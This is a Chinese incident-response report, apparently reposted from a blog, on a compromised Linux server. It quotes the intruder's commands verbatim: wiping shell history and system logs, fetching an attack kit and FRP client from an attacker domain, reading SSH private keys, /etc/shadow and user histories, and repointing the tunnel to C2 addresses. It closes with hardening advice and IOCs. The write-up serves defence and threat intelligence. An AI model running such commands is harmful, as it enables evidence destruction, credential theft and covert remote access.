2025年末Linux服务器入侵事件应急

admin
admin
admin
0
文章
0
评论
2026-01-05 18:17:23 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文记录了一起Linux服务器入侵应急响应事件。攻击者通过HIDS告警触发反取证,清理日志并禁用历史记录,随后下载包含Spirit控制及扫描爆破工具的恶意套件。攻击者窃取SSH私钥和密码后利用凭证横向移动,并部署FRP工具实现内网穿透与C2通信。建议清理恶意文件、通过堡垒机统一改密并对SSH服务进行网络隔离。 综合评分: 91 文章分类: 应急响应,内网渗透,威胁情报,恶意软件

cover_image

2025年末Linux服务器入侵事件应急

原创

kelvin

Mimi is Cat

2026年1月4日 20:18 广东

事件经过

收到HIDS告警清理痕迹设置操作命令不记录进日志

整体流程如下

禁用历史记录、删除日志文件等操作

unset HISTORY;unset HISTFILE;unset HISTSAVE;unset HISTZONE;unset HISTORY;unset HISTLOG;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;rm -rf .bash_history;rm -rf /var/run/utmp;rm -rf /var/run/wtmp;rm -rf /var/log/lastlog;rm -rf /usr/adm/lastlog;rm -rf .bash_history;rm -rf /var/log/auth.log*;cd /var/log/;rm -rf wtmp;rm -rf secure;rm -rf lastlog;rm -rf messages;touch messagess;touch wtmp;touch secure;touch lastlog;cd /root;rm -rf .bash_history;touch .bash_history

下载攻击套件

wget http://qae-org.qingyantek.com/usercenter/assets/.jss/n4.tgz

tar zxvf n4.tgz  # 解压后得到spirit等工具

rm -rf n4.tgz    # 清理下载痕迹

n4.tgz解压后network目录内spirit为go编写的总控制程序,从相关文件和调用的包及地址看得出主要是TG的Bot接口、gRPC、流量伪装,并调用masscan进行端口扫描、以及暴力破解、远程登录等脚本及功能

工作目录

/usr/local/games/network/  # 伪装路径,规避常规检测

窃取私钥、hash、从历史记录中读取明文密码等

cat /root/.ssh/id_rsa

cat /etc/shadow

for i in /home/* ; do cat $i/.bash_history; done

替换yum源为官方源

2025-12-29 00:28:29

curl -k -O http://qae-org.qingyantek.com/usercenter/assets/.jss/centos;rm -rf /etc/yum.repos.d/CentOS-Base.repo;mv centos /etc/yum.repos.d/CentOS-Base.repo

found.ssh:存储爆破成功的SSH账号密码

found.login:记录成功登录的会话

autossh.out:自动化SSH连接结果

密码登录

ssh [email protected] -p 22 # ***

密钥登录

ssh [email protected] -i id_rsa

下载并部署FRP内网穿透工具

2025-12-29 01:03:39 cd /etc/ppp/;mkdir frp;cd frp;wget –no-check-certificate http://qae-org.qingyantek.com/usercenter/assets/.jss/frpc.tgz;tar zxvf frpc.tgz;rm -rf frpc.tgz;sed -i ‘s|53954|443|g’ frpc.toml;sed -i ‘s|91.92.244.251|194.59.31.84|g’ frpc.toml;./frpc -c ./frpc.toml 2>/dev/null 1>/dev/null&

修改C2服务器配置

sed -i ‘s|53954|443|g’ frpc.toml          # 端口伪装

sed -i ‘s|91.92.244.251|194.59.31.84|g’ frpc.toml  # 切换C2

./frpc -c ./frpc.toml &                   # 后台常驻

事件归因

服务器10.193.161.109被入侵并通过抓取服务器中passwd、history、shadow等文件获取到多个账号密码、并通过这些账号密码登录扩散。

加固

1、 清理恶意文件恢复系统文件

2、 服务器不用统一密码,通过堡垒机自动改密

3、网络隔离各个区域SSH、RDP服务

IOCs

qae-org.qingyantek.com

91.92.244.251

194.59.31.84

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:Mimi is Cat kelvin《2025年末Linux服务器入侵事件应急》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  0